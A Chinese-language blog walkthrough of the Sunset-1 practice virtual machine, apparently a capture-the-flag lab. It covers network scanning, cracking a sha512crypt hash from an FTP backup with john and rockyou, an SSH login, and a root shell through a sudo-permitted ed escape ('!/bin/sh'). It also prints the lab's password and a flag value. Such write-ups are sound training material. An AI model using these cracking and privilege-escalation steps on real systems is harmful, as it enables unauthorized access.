侧边栏壁纸
博主头像

  • 累计撰写 12 篇文章
  • 累计创建 12 个标签
  • 累计收到 1 条评论

目 录CONTENT

文章目录

Sunset-1

⠀
2022-02-02 / 0 评论 / 0 点赞 / 181 阅读 / 513 字 / 正在检测是否收录...

信息收集

arp-scan -l

1.png
发现靶机 192.168.119.158
nmap -A -p1-65535 192.168.119.158
2.png
登录ftp
3.png
打开 是一个密文
4.png
解压字典

 gunzip   /usr/share/wordlists/rockyou.txt.gz

识别加密类型

john backup --wordlist=/usr/share/wordlists/rockyou.txt

5.png
发现是sha512
解密

john --format=sha512crypt backup --wordlist=/usr/share/wordlists/rockyou.txt

6.png
解密得到账号密码
cheer14 (sunset)
尝试登录ssh

连接ssh

ssh sunset@192.168.119.158

7.png
查看使用过那些操作
history
8.png
什么也没有0x0

提权

查看可以使用管理员打开的文件
sudo -l
9.png
发现 一个
(root) NOPASSWD: /usr/bin/ed 不需要密码也可以执行
ls 发现一个user.txt文件
一串十六进制
5b5b8e9b01ef27a1cc0a2d5fa87d7190
解密
10.png
也是不需要密码可执行
那就执行
sudo /usr/bin/ed
输入!/bin/sh,进入root权限
11.png

0

评论区